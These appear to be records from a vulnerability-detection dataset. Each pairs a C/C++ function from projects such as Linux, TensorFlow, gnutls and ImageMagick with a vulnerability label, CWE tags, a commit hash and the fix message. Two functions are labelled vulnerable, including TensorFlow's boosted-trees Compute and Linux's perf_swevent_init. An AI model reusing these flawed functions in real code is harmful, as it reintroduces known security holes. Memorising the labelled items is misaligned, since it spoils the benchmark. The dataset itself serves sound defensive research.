cdk_pk_to_fingerprint(cdk_pubkey_t pk, byte * fprbuf, size_t fprbuflen, size_t * r_nout) { size_t key_fprlen; cdk_error_t err; if (!pk) return CDK_Inv_Value; if (pk->version < 4) key_fprlen = 16; else key_fprlen = 20; /* Only return the required buffer size for the fingerprint. */ if (!fprbuf && !fprbuflen && r_nout) { *r_nout = key_fprlen; return 0; } if (!fprbuf || key_fprlen > fprbuflen) return CDK_Too_Short; err = cdk_pk_get_fingerprint(pk, fprbuf); if (r_nout) *r_nout = key_fprlen; return err; }
0
[ "CWE-119" ]
gnutls
5140422e0d7319a8e2fe07f02cbcafc4d6538732
339,308,311,876,024,700,000,000,000,000,000,000,000
29
opencdk: cdk_pk_get_keyid: fix stack overflow Issue found using oss-fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=340 Signed-off-by: Nikos Mavrogiannopoulos <[email protected]>
int on_header_callback2(nghttp2_session *session, const nghttp2_frame *frame, nghttp2_rcbuf *name, nghttp2_rcbuf *value, uint8_t flags, void *user_data) { auto hd = static_cast<Http2Handler *>(user_data); auto namebuf = nghttp2_rcbuf_get_buf(name); auto valuebuf = nghttp2_rcbuf_get_buf(value); if (hd->get_config()->verbose) { print_session_id(hd->session_id()); verbose_on_header_callback(session, frame, namebuf.base, namebuf.len, valuebuf.base, valuebuf.len, flags, user_data); } if (frame->hd.type != NGHTTP2_HEADERS || frame->headers.cat != NGHTTP2_HCAT_REQUEST) { return 0; } auto stream = hd->get_stream(frame->hd.stream_id); if (!stream) { return 0; } if (stream->header_buffer_size + namebuf.len + valuebuf.len > 64_k) { hd->submit_rst_stream(stream, NGHTTP2_INTERNAL_ERROR); return 0; } stream->header_buffer_size += namebuf.len + valuebuf.len; auto token = http2::lookup_token(namebuf.base, namebuf.len); auto &header = stream->header; switch (token) { case http2::HD__METHOD: header.method = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.method = value; nghttp2_rcbuf_incref(value); break; case http2::HD__SCHEME: header.scheme = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.scheme = value; nghttp2_rcbuf_incref(value); break; case http2::HD__AUTHORITY: header.authority = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.authority = value; nghttp2_rcbuf_incref(value); break; case http2::HD_HOST: header.host = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.host = value; nghttp2_rcbuf_incref(value); break; case http2::HD__PATH: header.path = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.path = value; nghttp2_rcbuf_incref(value); break; case http2::HD_IF_MODIFIED_SINCE: header.ims = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.ims = value; nghttp2_rcbuf_incref(value); break; case http2::HD_EXPECT: header.expect = StringRef{valuebuf.base, valuebuf.len}; header.rcbuf.expect = value; nghttp2_rcbuf_incref(value); break; } return 0; }
0
[]
nghttp2
95efb3e19d174354ca50c65d5d7227d92bcd60e1
242,651,159,111,661,400,000,000,000,000,000,000,000
73
Don't read too greedily
MagickPrivate int XCheckDefineCursor(Display *display,Window window, Cursor cursor) { (void) LogMagickEvent(TraceEvent,GetMagickModule(),"..."); assert(display != (Display *) NULL); if (window == XRootWindow(display,XDefaultScreen(display))) return(0); return(XDefineCursor(display,window,cursor)); }
0
[]
ImageMagick
f391a5f4554fe47eb56d6277ac32d1f698572f0e
48,489,802,761,512,155,000,000,000,000,000,000,000
9
https://github.com/ImageMagick/ImageMagick/issues/1531
static void brcmf_deinit_priv_mem(struct brcmf_cfg80211_info *cfg) { kfree(cfg->conf); cfg->conf = NULL; kfree(cfg->extra_buf); cfg->extra_buf = NULL; kfree(cfg->wowl.nd); cfg->wowl.nd = NULL; kfree(cfg->wowl.nd_info); cfg->wowl.nd_info = NULL; kfree(cfg->escan_info.escan_buf); cfg->escan_info.escan_buf = NULL; }
0
[ "CWE-119", "CWE-703" ]
linux
ded89912156b1a47d940a0c954c43afbabd0c42c
156,591,215,361,512,690,000,000,000,000,000,000,000
13
brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap() User-space can choose to omit NL80211_ATTR_SSID and only provide raw IE TLV data. When doing so it can provide SSID IE with length exceeding the allowed size. The driver further processes this IE copying it into a local variable without checking the length. Hence stack can be corrupted and used as exploit. Cc: [email protected] # v4.7 Reported-by: Daxing Guo <[email protected]> Reviewed-by: Hante Meuleman <[email protected]> Reviewed-by: Pieter-Paul Giesberts <[email protected]> Reviewed-by: Franky Lin <[email protected]> Signed-off-by: Arend van Spriel <[email protected]> Signed-off-by: Kalle Valo <[email protected]>
struct nfs_server *nfs4_create_referral_server(struct fs_context *fc) { struct nfs_fs_context *ctx = nfs_fc2context(fc); struct nfs_client *parent_client; struct nfs_server *server, *parent_server; bool auth_probe; int error; server = nfs_alloc_server(); if (!server) return ERR_PTR(-ENOMEM); parent_server = NFS_SB(ctx->clone_data.sb); parent_client = parent_server->nfs_client; server->cred = get_cred(parent_server->cred); /* Initialise the client representation from the parent server */ nfs_server_copy_userdata(server, parent_server); /* Get a client representation */ #if IS_ENABLED(CONFIG_SUNRPC_XPRT_RDMA) rpc_set_port(&ctx->nfs_server.address, NFS_RDMA_PORT); error = nfs4_set_client(server, ctx->nfs_server.hostname, &ctx->nfs_server.address, ctx->nfs_server.addrlen, parent_client->cl_ipaddr, XPRT_TRANSPORT_RDMA, parent_server->client->cl_timeout, parent_client->cl_mvops->minor_version, parent_client->cl_nconnect, parent_client->cl_net); if (!error) goto init_server; #endif /* IS_ENABLED(CONFIG_SUNRPC_XPRT_RDMA) */ rpc_set_port(&ctx->nfs_server.address, NFS_PORT); error = nfs4_set_client(server, ctx->nfs_server.hostname, &ctx->nfs_server.address, ctx->nfs_server.addrlen, parent_client->cl_ipaddr, XPRT_TRANSPORT_TCP, parent_server->client->cl_timeout, parent_client->cl_mvops->minor_version, parent_client->cl_nconnect, parent_client->cl_net); if (error < 0) goto error; #if IS_ENABLED(CONFIG_SUNRPC_XPRT_RDMA) init_server: #endif error = nfs_init_server_rpcclient(server, parent_server->client->cl_timeout, ctx->selected_flavor); if (error < 0) goto error; auth_probe = parent_server->auth_info.flavor_len < 1; error = nfs4_server_common_setup(server, ctx->mntfh, auth_probe); if (error < 0) goto error; return server; error: nfs_free_server(server); return ERR_PTR(error); }
0
[ "CWE-703" ]
linux
dd99e9f98fbf423ff6d365b37a98e8879170f17c
220,975,585,161,177,720,000,000,000,000,000,000,000
71
NFSv4: Initialise connection to the server in nfs4_alloc_client() Set up the connection to the NFSv4 server in nfs4_alloc_client(), before we've added the struct nfs_client to the net-namespace's nfs_client_list so that a downed server won't cause other mounts to hang in the trunking detection code. Reported-by: Michael Wakabayashi <[email protected]> Fixes: 5c6e5b60aae4 ("NFS: Fix an Oops in the pNFS files and flexfiles connection setup to the DS") Signed-off-by: Trond Myklebust <[email protected]>
static char *TranslateEvent(const char *module,const char *function, const size_t line,const char *domain,const char *event) { char *text; double elapsed_time, user_time; ExceptionInfo *exception; LogInfo *log_info; register char *q; register const char *p; size_t extent; time_t seconds; exception=AcquireExceptionInfo(); log_info=(LogInfo *) GetLogInfo("*",exception); exception=DestroyExceptionInfo(exception); seconds=time((time_t *) NULL); elapsed_time=GetElapsedTime(&log_info->timer); user_time=GetUserTime(&log_info->timer); text=AcquireString(event); if (log_info->format == (char *) NULL) return(text); extent=strlen(event)+MagickPathExtent; if (LocaleCompare(log_info->format,"xml") == 0) { char timestamp[MagickPathExtent]; /* Translate event in "XML" format. */ (void) FormatMagickTime(seconds,extent,timestamp); (void) FormatLocaleString(text,extent, "<entry>\n" " <timestamp>%s</timestamp>\n" " <elapsed-time>%lu:%02lu.%03lu</elapsed-time>\n" " <user-time>%0.3f</user-time>\n" " <process-id>%.20g</process-id>\n" " <thread-id>%.20g</thread-id>\n" " <module>%s</module>\n" " <function>%s</function>\n" " <line>%.20g</line>\n" " <domain>%s</domain>\n" " <event>%s</event>\n" "</entry>",timestamp,(unsigned long) (elapsed_time/60.0), (unsigned long) floor(fmod(elapsed_time,60.0)),(unsigned long) (1000.0*(elapsed_time-floor(elapsed_time))+0.5),user_time, (double) getpid(),(double) GetMagickThreadSignature(),module,function, (double) line,domain,event); return(text); } /* Translate event in "human readable" format. 
*/ q=text; for (p=log_info->format; *p != '\0'; p++) { *q='\0'; if ((size_t) (q-text+MagickPathExtent) >= extent) { extent+=MagickPathExtent; text=(char *) ResizeQuantumMemory(text,extent+MagickPathExtent, sizeof(*text)); if (text == (char *) NULL) return((char *) NULL); q=text+strlen(text); } /* The format of the log is defined by embedding special format characters: %c client name %d domain %e event %f function %g generation %l line %m module %n log name %p process id %r real CPU time %t wall clock time %u user CPU time %v version %% percent sign \n newline \r carriage return */ if ((*p == '\\') && (*(p+1) == 'r')) { *q++='\r'; p++; continue; } if ((*p == '\\') && (*(p+1) == 'n')) { *q++='\n'; p++; continue; } if (*p != '%') { *q++=(*p); continue; } p++; switch (*p) { case 'c': { q+=CopyMagickString(q,GetClientName(),extent); break; } case 'd': { q+=CopyMagickString(q,domain,extent); break; } case 'e': { q+=CopyMagickString(q,event,extent); break; } case 'f': { q+=CopyMagickString(q,function,extent); break; } case 'g': { if (log_info->generations == 0) { (void) CopyMagickString(q,"0",extent); q++; break; } q+=FormatLocaleString(q,extent,"%.20g",(double) (log_info->generation % log_info->generations)); break; } case 'l': { q+=FormatLocaleString(q,extent,"%.20g",(double) line); break; } case 'm': { register const char *r; for (r=module+strlen(module)-1; r > module; r--) if (*r == *DirectorySeparator) { r++; break; } q+=CopyMagickString(q,r,extent); break; } case 'n': { q+=CopyMagickString(q,GetLogName(),extent); break; } case 'p': { q+=FormatLocaleString(q,extent,"%.20g",(double) getpid()); break; } case 'r': { q+=FormatLocaleString(q,extent,"%lu:%02lu.%03lu",(unsigned long) (elapsed_time/60.0),(unsigned long) floor(fmod(elapsed_time,60.0)), (unsigned long) (1000.0*(elapsed_time-floor(elapsed_time))+0.5)); break; } case 't': { q+=FormatMagickTime(seconds,extent,q); break; } case 'u': { q+=FormatLocaleString(q,extent,"%0.3fu",user_time); break; } case 'v': { 
q+=CopyMagickString(q,MagickLibVersionText,extent); break; } case '%': { *q++=(*p); break; } default: { *q++='%'; *q++=(*p); break; } } } *q='\0'; return(text); }
0
[ "CWE-476" ]
ImageMagick
107ce8577e818cf4801e5a59641cb769d645cc95
159,992,352,984,492,450,000,000,000,000,000,000,000
221
https://github.com/ImageMagick/ImageMagick/issues/1224
void decode(bufferlist::iterator& bl) { __u8 struct_v; ::decode(struct_v, bl); ::decode(secret_id, bl); ::decode(blob, bl); }
0
[ "CWE-287", "CWE-284" ]
ceph
5ead97120e07054d80623dada90a5cc764c28468
11,970,075,804,419,067,000,000,000,000,000,000,000
6
auth/cephx: add authorizer challenge Allow the accepting side of a connection to reject an initial authorizer with a random challenge. The connecting side then has to respond with an updated authorizer proving they are able to decrypt the service's challenge and that the new authorizer was produced for this specific connection instance. The accepting side requires this challenge and response unconditionally if the client side advertises they have the feature bit. Servers wishing to require this improved level of authentication simply have to require the appropriate feature. Signed-off-by: Sage Weil <[email protected]> (cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b) # Conflicts: # src/auth/Auth.h # src/auth/cephx/CephxProtocol.cc # src/auth/cephx/CephxProtocol.h # src/auth/none/AuthNoneProtocol.h # src/msg/Dispatcher.h # src/msg/async/AsyncConnection.cc - const_iterator - ::decode vs decode - AsyncConnection ctor arg noise - get_random_bytes(), not cct->random()
void Compute(OpKernelContext* const context) override { // node_id_range const Tensor* node_id_range_t; OP_REQUIRES_OK(context, context->input("node_id_range", &node_id_range_t)); OP_REQUIRES( context, node_id_range_t->NumElements() == 2, errors::InvalidArgument("node_id_range argument must have shape [2]")); const auto node_id_range = node_id_range_t->vec<int32>(); const int32_t node_id_first = node_id_range(0); // inclusive const int32_t node_id_last = node_id_range(1); // exclusive const Tensor* stats_summary_t; OP_REQUIRES_OK(context, context->input("stats_summary", &stats_summary_t)); OP_REQUIRES( context, stats_summary_t->shape().dims() == 4, errors::InvalidArgument("stats_summary argument must have rank 4")); TTypes<float, 4>::ConstTensor stats_summary = stats_summary_t->tensor<float, 4>(); const int32_t feature_dims = stats_summary_t->dim_size(1); // The last bucket is for default/missing value. const int32_t num_buckets = stats_summary_t->dim_size(2) - 1; const int32_t logits_dim = logits_dim_; const int32_t hessian_dim = stats_summary_t->dim_size(3) - logits_dim; DCHECK_GT(hessian_dim, 0); DCHECK_LE(hessian_dim, logits_dim * logits_dim); const Tensor* l1_t; OP_REQUIRES_OK(context, context->input("l1", &l1_t)); OP_REQUIRES(context, l1_t->NumElements() == 1, errors::InvalidArgument("l1 argument must be a scalar")); const auto l1 = l1_t->scalar<float>()(); DCHECK_GE(l1, 0); if (logits_dim_ > 1) { // Multi-class L1 regularization not supported yet. 
DCHECK_EQ(l1, 0); } const Tensor* l2_t; OP_REQUIRES_OK(context, context->input("l2", &l2_t)); OP_REQUIRES(context, l2_t->NumElements() == 1, errors::InvalidArgument("l2 argument must be a scalar")); const auto l2 = l2_t->scalar<float>()(); DCHECK_GE(l2, 0); const Tensor* tree_complexity_t; OP_REQUIRES_OK(context, context->input("tree_complexity", &tree_complexity_t)); OP_REQUIRES( context, tree_complexity_t->NumElements() == 1, errors::InvalidArgument("tree_complexity argument must be a scalar")); const auto tree_complexity = tree_complexity_t->scalar<float>()(); const Tensor* min_node_weight_t; OP_REQUIRES_OK(context, context->input("min_node_weight", &min_node_weight_t)); OP_REQUIRES( context, min_node_weight_t->NumElements() == 1, errors::InvalidArgument("min_node_weight argument must be a scalar")); const auto min_node_weight = min_node_weight_t->scalar<float>()(); std::vector<int32> output_node_ids; std::vector<float> output_gains; std::vector<int32> output_feature_dimensions; std::vector<int32> output_thresholds; std::vector<Eigen::VectorXf> output_left_node_contribs; std::vector<Eigen::VectorXf> output_right_node_contribs; std::vector<std::string> output_split_types; // TODO(tanzheny) parallelize the computation. // Iterate each node and find the best gain per node. for (int32_t node_id = node_id_first; node_id < node_id_last; ++node_id) { float best_gain = std::numeric_limits<float>::lowest(); int32_t best_bucket = 0; int32_t best_f_dim = 0; string best_split_type; Eigen::VectorXf best_contrib_for_left(logits_dim); Eigen::VectorXf best_contrib_for_right(logits_dim); float parent_gain; // Including default bucket. 
ConstMatrixMap stats_mat(&stats_summary(node_id, 0, 0, 0), num_buckets + 1, logits_dim + hessian_dim); const Eigen::VectorXf total_grad = stats_mat.leftCols(logits_dim).colwise().sum(); const Eigen::VectorXf total_hess = stats_mat.rightCols(hessian_dim).colwise().sum(); if (total_hess.norm() < min_node_weight) { continue; } Eigen::VectorXf parent_weight(logits_dim); CalculateWeightsAndGains(total_grad, total_hess, l1, l2, &parent_weight, &parent_gain); if (split_type_ == "inequality") { CalculateBestInequalitySplit( stats_summary, node_id, feature_dims, logits_dim, hessian_dim, num_buckets, min_node_weight, l1, l2, &best_gain, &best_bucket, &best_f_dim, &best_split_type, &best_contrib_for_left, &best_contrib_for_right); } else { CalculateBestEqualitySplit( stats_summary, total_grad, total_hess, node_id, feature_dims, logits_dim, hessian_dim, num_buckets, l1, l2, &best_gain, &best_bucket, &best_f_dim, &best_split_type, &best_contrib_for_left, &best_contrib_for_right); } if (best_gain == std::numeric_limits<float>::lowest()) { // Do not add the node if not split if found. continue; } output_node_ids.push_back(node_id); // Remove the parent gain for the parent node. output_gains.push_back(best_gain - parent_gain); output_feature_dimensions.push_back(best_f_dim); // default direction is fixed for dense splits. // TODO(tanzheny) account for default values. 
output_split_types.push_back(best_split_type); output_thresholds.push_back(best_bucket); output_left_node_contribs.push_back(best_contrib_for_left); output_right_node_contribs.push_back(best_contrib_for_right); } // for node id const int num_nodes = output_node_ids.size(); // output_node_ids Tensor* output_node_ids_t = nullptr; OP_REQUIRES_OK(context, context->allocate_output("node_ids", {num_nodes}, &output_node_ids_t)); auto output_node_ids_vec = output_node_ids_t->vec<int32>(); // output_gains Tensor* output_gains_t; OP_REQUIRES_OK(context, context->allocate_output("gains", {num_nodes}, &output_gains_t)); auto output_gains_vec = output_gains_t->vec<float>(); // output_feature_dimensions Tensor* output_feature_dimension_t; OP_REQUIRES_OK(context, context->allocate_output("feature_dimensions", {num_nodes}, &output_feature_dimension_t)); auto output_feature_dimensions_vec = output_feature_dimension_t->vec<int32>(); // output_thresholds Tensor* output_thresholds_t; OP_REQUIRES_OK(context, context->allocate_output("thresholds", {num_nodes}, &output_thresholds_t)); auto output_thresholds_vec = output_thresholds_t->vec<int32>(); // output_left_node_contribs Tensor* output_left_node_contribs_t; OP_REQUIRES_OK(context, context->allocate_output( "left_node_contribs", {num_nodes, logits_dim}, &output_left_node_contribs_t)); auto output_left_node_contribs_matrix = output_left_node_contribs_t->matrix<float>(); // output_right_node_contribs Tensor* output_right_node_contribs_t; OP_REQUIRES_OK(context, context->allocate_output( "right_node_contribs", {num_nodes, logits_dim}, &output_right_node_contribs_t)); auto output_right_node_contribs_matrix = output_right_node_contribs_t->matrix<float>(); // split type Tensor* output_split_types_t; OP_REQUIRES_OK( context, context->allocate_output("split_with_default_directions", {num_nodes}, &output_split_types_t)); auto output_split_types_vec = output_split_types_t->vec<tstring>(); // Sets output tensors from vectors. 
for (int i = 0; i < num_nodes; ++i) { output_node_ids_vec(i) = output_node_ids[i]; // Adjust the gains to penalize by tree complexity. output_gains_vec(i) = output_gains[i] - tree_complexity; output_feature_dimensions_vec(i) = output_feature_dimensions[i]; output_thresholds_vec(i) = output_thresholds[i]; for (int j = 0; j < logits_dim; ++j) { output_left_node_contribs_matrix(i, j) = output_left_node_contribs[i][j]; output_right_node_contribs_matrix(i, j) = output_right_node_contribs[i][j]; } output_split_types_vec(i) = output_split_types[i]; } }
1
[ "CWE-476", "CWE-369" ]
tensorflow
5c8c9a8bfe750f9743d0c859bae112060b216f5c
7,202,424,637,991,012,000,000,000,000,000,000,000
188
Fixing security fixes in boosted trees ops PiperOrigin-RevId: 405669548 Change-Id: Iae224d240d1779bcc02405c2fff99785644fbd0d
TEST(BoolTest, FormatBool) { EXPECT_EQ("true", format("{}", true)); EXPECT_EQ("false", format("{}", false)); EXPECT_EQ("1", format("{:d}", true)); EXPECT_EQ("true ", format("{:5}", true)); EXPECT_EQ(L"true", format(L"{}", true)); }
0
[ "CWE-134", "CWE-119", "CWE-787" ]
fmt
8cf30aa2be256eba07bb1cefb998c52326e846e7
38,423,163,649,420,490,000,000,000,000,000,000,000
7
Fix segfault on complex pointer formatting (#642)
static void nfs4_destroy_server(struct nfs_server *server) { LIST_HEAD(freeme); nfs_server_return_all_delegations(server); unset_pnfs_layoutdriver(server); nfs4_purge_state_owners(server, &freeme); nfs4_free_state_owners(&freeme); }
0
[ "CWE-703" ]
linux
dd99e9f98fbf423ff6d365b37a98e8879170f17c
308,258,045,588,436,040,000,000,000,000,000,000,000
9
NFSv4: Initialise connection to the server in nfs4_alloc_client() Set up the connection to the NFSv4 server in nfs4_alloc_client(), before we've added the struct nfs_client to the net-namespace's nfs_client_list so that a downed server won't cause other mounts to hang in the trunking detection code. Reported-by: Michael Wakabayashi <[email protected]> Fixes: 5c6e5b60aae4 ("NFS: Fix an Oops in the pNFS files and flexfiles connection setup to the DS") Signed-off-by: Trond Myklebust <[email protected]>
static int ntop_dump_file(lua_State* vm) { char *fname; FILE *fd; struct mg_connection *conn; ntop->getTrace()->traceEvent(TRACE_DEBUG, "%s() called", __FUNCTION__); lua_getglobal(vm, CONST_HTTP_CONN); if((conn = (struct mg_connection*)lua_touserdata(vm, lua_gettop(vm))) == NULL) { ntop->getTrace()->traceEvent(TRACE_ERROR, "INTERNAL ERROR: null HTTP connection"); return(CONST_LUA_ERROR); } if(ntop_lua_check(vm, __FUNCTION__, 1, LUA_TSTRING)) return(CONST_LUA_ERROR); if((fname = (char*)lua_tostring(vm, 1)) == NULL) return(CONST_LUA_PARAM_ERROR); ntop->fixPath(fname); if((fd = fopen(fname, "r")) != NULL) { char tmp[1024]; ntop->getTrace()->traceEvent(TRACE_INFO, "[HTTP] Serving file %s", fname); while((fgets(tmp, sizeof(tmp)-256 /* To make sure we have room for replacements */, fd)) != NULL) { for(int i=0; string_to_replace[i].key != NULL; i++) Utils::replacestr(tmp, string_to_replace[i].key, string_to_replace[i].val); mg_printf(conn, "%s", tmp); } fclose(fd); return(CONST_LUA_OK); } else { ntop->getTrace()->traceEvent(TRACE_INFO, "Unable to read file %s", fname); return(CONST_LUA_ERROR); } }
0
[ "CWE-476" ]
ntopng
01f47e04fd7c8d54399c9e465f823f0017069f8f
34,529,004,953,682,386,000,000,000,000,000,000,000
36
Security fix: prevents empty host from being used
static void session_unsub(broker_t *b, pn_session_t *ssn) { pn_connection_t *c = pn_session_connection(ssn); pn_link_t *l; for (l = pn_link_head(c, 0); l != NULL; l = pn_link_next(l, 0)) { if (pn_link_session(l) == ssn) link_unsub(b, l); }
0
[]
qpid-proton
159fac1f90d9b1ace1138d510176e7a5da54e9e9
277,542,837,520,524,200,000,000,000,000,000,000,000
8
PROTON-2014: [c] Fix example broker to warn when it fails to set up ssl - Also make send-ssl tell you the remote peer
write_card32 (FILE *ofp, L_CARD32 c) { putc ((int) ((c >> 24) & 0xff), ofp); putc ((int) ((c >> 16) & 0xff), ofp); putc ((int) ((c >> 8) & 0xff), ofp); putc ((int) ((c) & 0xff), ofp); }
0
[ "CWE-787" ]
gimp
0b35f6a082a0b3c372c568ea6bde39a4796acde2
31,709,675,318,414,318,000,000,000,000,000,000,000
8
Bug 687392 - Memory corruption vulnerability when reading XWD files Applied and enhanced patch from andres which makes file-xwd detect this kind of file corruption and abort loading with an error message.
int sqlite3ExprContainsSubquery(Expr *p){ Walker w; w.eCode = 1; w.xExprCallback = sqlite3ExprWalkNoop; w.xSelectCallback = sqlite3SelectWalkFail; #ifdef SQLITE_DEBUG w.xSelectCallback2 = sqlite3SelectWalkAssert2; #endif sqlite3WalkExpr(&w, p); return w.eCode==0; }
0
[ "CWE-476" ]
sqlite
57f7ece78410a8aae86aa4625fb7556897db384c
184,046,857,421,702,300,000,000,000,000,000,000,000
11
Fix a problem that comes up when using generated columns that evaluate to a constant in an index and then making use of that index in a join. FossilOrigin-Name: 8b12e95fec7ce6e0de82a04ca3dfcf1a8e62e233b7382aa28a8a9be6e862b1af
static int selinux_binder_set_context_mgr(struct task_struct *mgr) { return avc_has_perm(&selinux_state, current_sid(), task_sid_binder(mgr), SECCLASS_BINDER, BINDER__SET_CONTEXT_MGR, NULL); }
0
[ "CWE-416" ]
linux
a3727a8bac0a9e77c70820655fd8715523ba3db7
62,195,760,426,971,520,000,000,000,000,000,000,000
6
selinux,smack: fix subjective/objective credential use mixups Jann Horn reported a problem with commit eb1231f73c4d ("selinux: clarify task subjective and objective credentials") where some LSM hooks were attempting to access the subjective credentials of a task other than the current task. Generally speaking, it is not safe to access another task's subjective credentials and doing so can cause a number of problems. Further, while looking into the problem, I realized that Smack was suffering from a similar problem brought about by a similar commit 1fb057dcde11 ("smack: differentiate between subjective and objective task credentials"). This patch addresses this problem by restoring the use of the task's objective credentials in those cases where the task is other than the current executing task. Not only does this resolve the problem reported by Jann, it is arguably the correct thing to do in these cases. Cc: [email protected] Fixes: eb1231f73c4d ("selinux: clarify task subjective and objective credentials") Fixes: 1fb057dcde11 ("smack: differentiate between subjective and objective task credentials") Reported-by: Jann Horn <[email protected]> Acked-by: Eric W. Biederman <[email protected]> Acked-by: Casey Schaufler <[email protected]> Signed-off-by: Paul Moore <[email protected]>
void expectNoProtocol() { expectHandshakeSuccess(); EXPECT_EQ(client->nextProtoLength, 0); EXPECT_EQ(server->nextProtoLength, 0); EXPECT_EQ(client->nextProto, nullptr); EXPECT_EQ(server->nextProto, nullptr); }
0
[ "CWE-125" ]
folly
c321eb588909646c15aefde035fd3133ba32cdee
4,775,311,824,206,311,000,000,000,000,000,000,000
7
Handle close_notify as standard writeErr in AsyncSSLSocket. Summary: Fixes CVE-2019-11934 Reviewed By: mingtaoy Differential Revision: D18020613 fbshipit-source-id: db82bb250e53f0d225f1280bd67bc74abd417836
static bool cmd_ibm_sense_condition(IDEState *s, uint8_t cmd) { switch (s->feature) { case 0x01: /* sense temperature in device */ s->nsector = 0x50; /* +20 C */ break; default: ide_abort_command(s); return true; } return true; }
0
[ "CWE-189" ]
qemu
940973ae0b45c9b6817bab8e4cf4df99a9ef83d7
158,488,838,950,567,770,000,000,000,000,000,000,000
13
ide: Correct improper smart self test counter reset in ide core. The SMART self test counter was incorrectly being reset to zero, not 1. This had the effect that on every 21st SMART EXECUTE OFFLINE: * We would write off the beginning of a dynamically allocated buffer * We forgot the SMART history Fix this. Signed-off-by: Benoit Canet <[email protected]> Message-id: [email protected] Reviewed-by: Markus Armbruster <[email protected]> Cc: [email protected] Acked-by: Kevin Wolf <[email protected]> [PMM: tweaked commit message as per suggestions from Markus] Signed-off-by: Peter Maydell <[email protected]>
static void nalm_dump(FILE * trace, char *data, u32 data_size) { GF_BitStream *bs; Bool rle, large_size; u32 entry_count; if (!data) { gf_fprintf(trace, "<NALUMap rle=\"\" large_size=\"\">\n"); gf_fprintf(trace, "<NALUMapEntry NALU_startNumber=\"\" groupID=\"\"/>\n"); gf_fprintf(trace, "</NALUMap>\n"); return; } bs = gf_bs_new(data, data_size, GF_BITSTREAM_READ); gf_bs_read_int(bs, 6); large_size = gf_bs_read_int(bs, 1); rle = gf_bs_read_int(bs, 1); entry_count = gf_bs_read_int(bs, large_size ? 16 : 8); gf_fprintf(trace, "<NALUMap rle=\"%d\" large_size=\"%d\">\n", rle, large_size); while (entry_count) { u32 ID; gf_fprintf(trace, "<NALUMapEntry "); if (rle) { u32 start_num = gf_bs_read_int(bs, large_size ? 16 : 8); gf_fprintf(trace, "NALU_startNumber=\"%d\" ", start_num); } ID = gf_bs_read_u16(bs); gf_fprintf(trace, "groupID=\"%d\"/>\n", ID); entry_count--; } gf_bs_del(bs); gf_fprintf(trace, "</NALUMap>\n"); return; }
0
[ "CWE-787" ]
gpac
ea1eca00fd92fa17f0e25ac25652622924a9a6a0
270,332,910,197,558,770,000,000,000,000,000,000,000
36
fixed #2138
xmlSchemaAddType(xmlSchemaParserCtxtPtr ctxt, xmlSchemaPtr schema, xmlSchemaTypeType type, const xmlChar * name, const xmlChar * nsName, xmlNodePtr node, int topLevel) { xmlSchemaTypePtr ret = NULL; if ((ctxt == NULL) || (schema == NULL)) return (NULL); ret = (xmlSchemaTypePtr) xmlMalloc(sizeof(xmlSchemaType)); if (ret == NULL) { xmlSchemaPErrMemory(ctxt, "allocating type", NULL); return (NULL); } memset(ret, 0, sizeof(xmlSchemaType)); ret->type = type; ret->name = name; ret->targetNamespace = nsName; ret->node = node; if (topLevel) { if (ctxt->isRedefine) { ctxt->redef = xmlSchemaAddRedef(ctxt, ctxt->redefined, ret, name, nsName); if (ctxt->redef == NULL) { xmlFree(ret); return(NULL); } ctxt->redefCounter = 0; } WXS_ADD_GLOBAL(ctxt, ret); } else WXS_ADD_LOCAL(ctxt, ret); WXS_ADD_PENDING(ctxt, ret); return (ret); }
0
[ "CWE-134" ]
libxml2
4472c3a5a5b516aaf59b89be602fbce52756c3e9
125,168,708,111,798,160,000,000,000,000,000,000,000
36
Fix some format string warnings with possible format string vulnerability For https://bugzilla.gnome.org/show_bug.cgi?id=761029 Decorate every method in libxml2 with the appropriate LIBXML_ATTR_FORMAT(fmt,args) macro and add some cleanups following the reports.
void dw_spi_remove_host(struct dw_spi *dws) { dw_spi_debugfs_remove(dws); if (dws->dma_ops && dws->dma_ops->dma_exit) dws->dma_ops->dma_exit(dws); spi_shutdown_chip(dws); free_irq(dws->irq, dws->master); }
0
[ "CWE-662" ]
linux
19b61392c5a852b4e8a0bf35aecb969983c5932d
212,238,814,548,671,270,000,000,000,000,000,000,000
11
spi: spi-dw: Add lock protect dw_spi rx/tx to prevent concurrent calls dw_spi_irq() and dw_spi_transfer_one concurrent calls. I find a panic in dw_writer(): txw = *(u8 *)(dws->tx), when dw->tx==null, dw->len==4, and dw->tx_end==1. When tpm driver's message overtime dw_spi_irq() and dw_spi_transfer_one may concurrent visit dw_spi, so I think dw_spi structure lack of protection. Otherwise dw_spi_transfer_one set dw rx/tx buffer and then open irq, store dw rx/tx instructions and other cores handle irq load dw rx/tx instructions may out of order. [ 1025.321302] Call trace: ... [ 1025.321319] __crash_kexec+0x98/0x148 [ 1025.321323] panic+0x17c/0x314 [ 1025.321329] die+0x29c/0x2e8 [ 1025.321334] die_kernel_fault+0x68/0x78 [ 1025.321337] __do_kernel_fault+0x90/0xb0 [ 1025.321346] do_page_fault+0x88/0x500 [ 1025.321347] do_translation_fault+0xa8/0xb8 [ 1025.321349] do_mem_abort+0x68/0x118 [ 1025.321351] el1_da+0x20/0x8c [ 1025.321362] dw_writer+0xc8/0xd0 [ 1025.321364] interrupt_transfer+0x60/0x110 [ 1025.321365] dw_spi_irq+0x48/0x70 ... Signed-off-by: wuxu.wu <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Mark Brown <[email protected]>
static int perf_swevent_init(struct perf_event *event) { int event_id = event->attr.config; if (event->attr.type != PERF_TYPE_SOFTWARE) return -ENOENT; /* * no branch sampling for software events */ if (has_branch_stack(event)) return -EOPNOTSUPP; switch (event_id) { case PERF_COUNT_SW_CPU_CLOCK: case PERF_COUNT_SW_TASK_CLOCK: return -ENOENT; default: break; } if (event_id >= PERF_COUNT_SW_MAX) return -ENOENT; if (!event->parent) { int err; err = swevent_hlist_get(event); if (err) return err; static_key_slow_inc(&perf_swevent_enabled[event_id]); event->destroy = sw_perf_event_destroy; } return 0; }
1
[ "CWE-703", "CWE-189" ]
linux
8176cced706b5e5d15887584150764894e94e02f
210,222,523,471,394,240,000,000,000,000,000,000,000
38
